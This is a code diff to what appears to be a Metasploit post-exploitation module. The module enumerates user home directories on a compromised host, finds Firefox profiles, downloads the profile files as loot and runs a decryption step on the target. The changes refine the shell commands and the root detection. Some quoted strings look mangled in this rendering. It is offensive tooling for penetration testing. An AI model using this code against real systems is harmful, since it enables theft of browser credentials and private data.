@@ -146,7 +146,7 @@ def do_decrypt
146146 omnija = read_file ( @paths [ 'ff' ] + org_file )
147147 if omnija . nil? or omnija . empty? or omnija =~ /No such file/i
148148 print_error ( "Could not download: #{ @paths [ 'ff' ] + org_file } )
149- print_error ( "Tip: Try swtiching to a meterpreter shell if possible (as its more reliable/stable when downloading)" ) if session . type != "meterpreter"
149+ print_error ( "Tip: Try switching to a meterpreter shell if possible (as it's more reliable/stable when downloading)" ) if session . type != "meterpreter"
150150 return
151151 end
152152
@@ -249,8 +249,8 @@ def enum_users
249249
250250 if got_root
251251 vprint_status ( "Detected ROOT privileges. Searching every account on the target system." )
252- userdirs = cmd_exec ( "find #{ home } -maxdepth 1 -mindepth 1 2>/dev/null" ) . gsub ( / \s / , " \n " )
253- userdirs << "/root \n "
252+ userdirs = "/root \n "
253+ userdirs << cmd_exec ( "find #{ home } -maxdepth 1 -mindepth 1 -type d 2>/dev/null" )
254254 else
255255 vprint_status ( "Checking #{ id } )
256256 userdirs = "#{ home + id } \n "
@@ -260,16 +260,16 @@ def enum_users
260260 dir . chomp!
261261 next if dir == "." or dir == ".." or dir =~ /No such file/i
262262
263- @platform == :osx ? ( basepath = "#{ dir } \\ Support/Firefox/Profiles/ " ) : ( basepath = "#{ dir } / " )
263+ @platform == :osx ? ( basepath = "#{ dir } ) : ( basepath = "#{ dir } )
264264
265265 print_status ( "Checking for Firefox profile in: #{ basepath } )
266- checkpath = cmd_exec ( "ls #{ basepath } " ) . gsub ( /\s / , "\n " )
266+ checkpath = cmd_exec ( "find " + basepath . gsub ( / / , "\\ " ) + " -maxdepth 1 -mindepth 1 -type d 2>/dev/null ")
267267
268268 checkpath . each_line do |ffpath |
269269 ffpath . chomp!
270- if ffpath =~ /\. default/
271- vprint_good ( "Found profile: #{ basepath + ffpath } )
272- paths << "#{ basepath + ffpath }
270+ if ffpath =~ /\. default$ /
271+ vprint_good ( "Found profile: #{ ffpath } )
272+ paths << "#{ ffpath }
273273 end
274274 end
275275 end
@@ -332,7 +332,7 @@ def download_loot(paths)
332332 profile = path . scan ( /Profiles[\\ |\/ ](.+)\. (.+)$/ ) . flatten [ 0 ] . to_s
333333 profile = path . scan ( /firefox[\\ |\/ ](.+)\. (.+)$/ ) . flatten [ 0 ] . to_s if profile . empty?
334334
335- session . type == "meterpreter" ? ( files = session . fs . dir . foreach ( path ) ) : ( files = cmd_exec ( "ls #{ path } 2>/dev/null" ) . split ( ) )
335+ session . type == "meterpreter" ? ( files = session . fs . dir . foreach ( path ) ) : ( files = cmd_exec ( "find " + path . gsub ( / / , " \\ " ) + " -maxdepth 1 -mindepth 1 -type f 2>/dev/null") . gsub ( /.* \/ / , "" ) . split ( " \n " ) )
336336
337337 files . each do |file |
338338 file . chomp!
@@ -551,12 +551,18 @@ def decrypt_trigger_decrypt(org_file, new_file, temp_file)
551551 when :unix
552552 # Assuming userdir /home/(x) = user
553553 print_status ( "Enumerating users" )
554- users = cmd_exec ( "ls /home 2>/dev/null" )
555- if users . nil? or users . empty?
554+ homedirs = cmd_exec ( "find /home -maxdepth 1 -mindepth 1 -type d 2>/dev/null" ) . gsub ( /.* \/ / , " ")
555+ if homedirs . nil? or homedirs . empty?
556556 print_error ( "No normal user found" )
557557 return false
558558 end
559- user = users . split [ 0 ]
559+ user = nil
560+ # Skip home directories which contain a space, as those are likely not usernames...
561+ homedirs . each_line do |homedir |
562+ user = homedir . chomp
563+ break unless user . index ( " " )
564+ end
565+
560566 # Since we can't access the display environment variable we have to assume the default value
561567 args . insert ( 0 , "\" #{ @paths [ 'ff' ] } )
562568 args << "\" "
@@ -719,6 +725,10 @@ def got_root
719725 session . sys . config . getuid =~ /SYSTEM/ ? true : false
720726 else # unix, bsd, linux, osx
721727 id_output = cmd_exec ( "id" ) . chomp
728+ if id_output . blank?
729+ # try an absolute path
730+ id_output = cmd_exec ( "/usr/bin/id" ) . chomp
731+ end
722732 id_output . include? ( "uid=0(" ) ? true : false
723733 end
724734 end
0 commit comments